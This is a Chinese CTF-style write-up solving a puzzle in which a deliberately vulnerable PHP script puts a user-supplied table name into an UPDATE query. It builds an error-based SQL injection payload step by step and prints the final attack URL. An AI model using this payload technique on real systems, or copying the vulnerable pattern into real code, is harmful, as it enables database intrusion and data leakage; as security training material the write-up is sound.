p牛在群里面出了一個好玩的題目,正好晚上空虛寂寞冷,就做一下暖暖身子,題目是:
<?php
$link = mysqli_connect('localhost', 'root', 'root');
mysqli_select_db($link, 'code');
$table = addslashes($_GET['table']);
$sql = "UPDATE `{$table}`
SET `username`='admin'
WHERE id=1";
if(!mysqli_query($link, $sql)) {
echo(mysqli_error($link));
}
mysqli_close($link);首先一看,這個題目有幾個坑,首先update下的注入不是很常見,第二因為有addslashes的存在,整個注入不能出現單引號,雙引號和斜線等,第三就是這個sql語句沒有寫在一行代碼里面,所以不能用單行注釋把后面的語句注釋掉
這樣導致整個注入語句只能在UPDATE {$table}發揮了
首先查一下mysql update的用法:
http://www.cnblogs.com/ggjucheng/archive/2012/11/06/2756392.html
這個文章在末尾有個很有用的提示:但是multiple-table UPDATE語句可以使用在SELECT語句中允許的任何類型的聯合,比如LEFT JOIN
這個于是我就搜到另一個文章:Mysql跨表更新 多表update sql語句總結(http://www.jb51.net/article/32648.htm)
里面有幾個簡單的用到LEFT JOIN的例子,但是似乎還不夠,我希望能引入一個子查詢,于是我找到了另一個文章:http://blog.csdn.net/catoop/article/details/46670911
這個文章里面有個例子不錯:
UPDATE student D
LEFT JOIN (SELECT
B.studentId,
SUM(B.score) AS s_sum,
ROUND(AVG(B.score),1) AS s_avg
FROM score B
WHERE b.examTime >= '2015-03-10'
GROUP BY B.studentId) C
ON (C.studentId = D.id)
SET D.score_sum = c.s_sum,
D.score_avg = c.s_avg
WHERE D.id =
(
SELECT
E.id FROM
(
SELECT
DISTINCT a.studentId AS id
FROM score A
WHERE A.examTime >= '2015-03-10'
) E
WHERE E.id = D.id
)
AND d.age = 1;可以看到他引入了子查詢在update語句里面,而且子查詢的位置剛剛好在我想要的地方,于是我構造一個這樣的子查詢:
update `table` t left join (select id from `table`) tt on tt.user=t.username set username ='admin' where id=1;但是報錯:ERROR 1052 (23000): Column 'id' in where clause is ambiguous 原因是:是因為多表查詢的時候幾個表中同時出現了某個相同的列名, 所以不能出現相同的列名,但是,我除了table表以外不知道數據庫的其他表了,或者根本就只有一個表,所以我就要用mysql的虛表dual,
update `table` t left join (select ‘1’ as user from dual) tt on tt.user=t.username set username ='admin' where id=1;我這里用select ‘1’ as user from dual 把’1’這個字段重命名是要滿足后面on的條件,及:on tt.user=t.username 而且這里要用‘1’而不是用數字是因為tale表里面的username類型是varchar類型 執行后面發現可以正常更新,也就是說成功的引入了一個子查詢在我想要的地方,那么后面的事情就簡單很多了,直接引入一個報錯注入的語句在子查詢里面就可以了初期的答案是:
table` t left join (select '1' as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username注入后完整sql語句
update `table` t left join (select \‘1\’ as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username`
set username ='admin'
where id=1我很快的發現兩個問題 1.注入后的反引號沒有閉合2.就是單引號被轉義掉了 解決第一個問題就是在on的最后一個字段上加入一個反引號,讓他和后面的的反引號閉合 解決第二個問題就是把出現單引號的位置用char函數代替 于是完美的答案就出現了:
http://localhost/code.php?table=table` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username注入之后的sql語句是是:
update `table` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username`
set username ='admin'
where id=1;
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/216/
